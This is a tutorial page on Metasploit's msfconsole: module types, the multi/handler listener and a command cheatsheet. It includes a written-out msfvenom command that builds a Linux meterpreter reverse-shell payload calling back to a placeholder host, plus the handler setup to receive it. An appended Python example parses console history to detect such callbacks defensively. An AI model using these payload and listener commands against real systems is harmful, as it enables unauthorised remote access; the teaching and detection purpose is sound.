Metasploit Console

Msfconsole:

Definition

Msfconsole is the main command-line tool used for exploitation. Just like msfvenom, msfconsole is pre-installed on Kali Linux.

Msfconsole has four main module types: payloads, exploits, encoders and auxiliary. All of these modules let you change their parameters to customise an attack. To see a full list of any of these components, use the command ‘show’ followed by the component name.

A multi-handler enables the attacker to gain shell access to a machine with the same system/architecture and wait for attacker instructions to execute payloads. It operates similarly to a netcat session, or as a ‘smart listener’. When sending a handler to a target machine, a small ‘stub’ is placed, containing information about the payload you have set. You then connect to the target port and send the exploit for the ‘stub’ to execute. Once it is sent, you can listen on the port to send commands to the target machine. A multi-handler can do this, but you can also send this payload to multiple targets; the payload also maintains a ‘persistent’ state, so if a target restarts, listening on the port again will automatically open a shell.

Exploit/Multi/Handler

To load Multi/Handler:
use exploit/multi/handler

show exploits – Lists the exploits you can run.
show payloads – Lists the payloads you can execute on the exploited system.
info exploit [exploit name] – Lists a description of a specific exploit, plus its various options and requirements.
info payload [payload name] – Lists a description of a specific payload, plus its various options and requirements.
use [exploit name] – msfconsole will enter into a specific exploit’s environment.

show payloads – Lists the payloads compatible with the specific exploit you have selected.
set PAYLOAD – Allows you to set the specific payload for your exploit.
show targets – Lists the possible targets (OSs and applications) that can be exploited.
set [TARGET] – Selects your specific target OS/application.

set RHOST – Sets your target host’s IP address.
set LHOST – Sets the local host’s IP address for the reverse communications needed to open the reverse command shell.

You can also combine multi/handler with msfvenom. For example, to create a reverse_tcp listener and payload:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[HOST_IP] lport=[LISTENING_PORT] -f elf > shell.elf
Then open your multi/handler:
use multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST [HOST IP]
set LPORT [LISTENING_PORT]
exploit
Now you will have a listener. Upload your payload and you should see something like this:

Cheatsheet:

back – Move back from the current context
banner – Display an awesome Metasploit banner
cd – Change the current working directory
color – Toggle color
connect – Communicate with a host
edit – Edit the current module with $VISUAL or $EDITOR
exit – Exit the console
get – Gets the value of a context-specific variable
getg – Gets the value of a global variable
go_pro – Launch Metasploit web GUI
grep – Grep the output of another command
help – Help menu
info – Displays information about one or more modules
irb – Drop into irb scripting mode
jobs – Displays and manages jobs
kill – Kill a job
load – Load a framework plugin
loadpath – Searches for and loads modules from a path
makerc – Save commands entered since start to a file
popm – Pops the latest module off the stack and makes it active
previous – Sets the previously loaded module as the current module
pushm – Pushes the active or list of modules onto the module stack
quit – Exit the console
reload_all – Reloads all modules from all defined module paths
rename_job – Rename a job
resource – Run the commands stored in a file
route – Route traffic through a session
save – Saves the active datastores
search – Searches module names and descriptions
sessions – Dump session listings and display information about sessions
set – Sets a context-specific variable to a value
setg – Sets a global variable to a value
show – Displays modules of a given type, or all modules
sleep – Do nothing for the specified number of seconds
spool – Write console output into a file as well as the screen
threads – View and manipulate background threads
unload – Unload a framework plugin
unset – Unsets one or more context-specific variables
unsetg – Unsets one or more global variables
use – Selects a module by name
version – Show the framework and console library version numbers

More in-depth descriptions of some of the commands mentioned above are available from Offensive Security and AndreaFortuna.
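The makerc command in the cheatsheet saves the console history, including the set LHOST / set LPORT lines from the multi/handler example, so after a lab exercise the defending side can use that file to find which hosts called back to the listener. The Python below is an added example, not part of the original page or of Metasploit; the IP addresses, the history file contents and the four-column connection log format are constructed assumptions.

```python
import shlex

# Constructed sample: console history as saved by `makerc` during a lab exercise.
RC_SAMPLE = """\
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.0.5.20
set lport 4444
exploit
"""

# Constructed sample: outbound connection log, assumed format "time src dst dport".
CONN_SAMPLE = """\
2024-03-01T10:02:11Z 10.0.1.15 10.0.5.20 4444
2024-03-01T10:02:40Z 10.0.1.16 10.0.5.20 443
2024-03-01T10:03:05Z 10.0.1.22 10.0.5.20 4444
2024-03-01T10:03:09Z 10.0.1.15 203.0.113.9 443
"""

def parse_listeners(rc_text):
    """Return one dict per handler launch: the module plus the options set for it."""
    listeners, module, opts = [], None, {}
    for raw in rc_text.splitlines():
        parts = shlex.split(raw, comments=True)   # drops '#' comments in the file
        if not parts:
            continue
        cmd = parts[0].lower()
        if cmd == "use" and len(parts) > 1:
            module, opts = parts[1], {}           # options belong to the active module
        elif cmd == "set" and len(parts) > 2:
            opts[parts[1].upper()] = parts[2]     # option names are case-insensitive
        elif cmd in ("exploit", "run") and module and module.endswith("multi/handler"):
            listeners.append({"module": module, **opts})
    return listeners

def callbacks(listeners, conn_text):
    """Return (time, source) for each connection that reached a listener's LHOST:LPORT."""
    wanted = {(l.get("LHOST"), l.get("LPORT")) for l in listeners}
    hits = []
    for line in conn_text.splitlines():
        fields = line.split()
        if len(fields) == 4 and (fields[2], fields[3]) in wanted:
            hits.append((fields[0], fields[1]))
    return hits

if __name__ == "__main__":
    for ts, src in callbacks(parse_listeners(RC_SAMPLE), CONN_SAMPLE):
        print(f"{ts} callback from {src}")
```

A handler that was configured but never started with exploit or run is ignored, and both use exploit/multi/handler and the shorter use multi/handler are recognised.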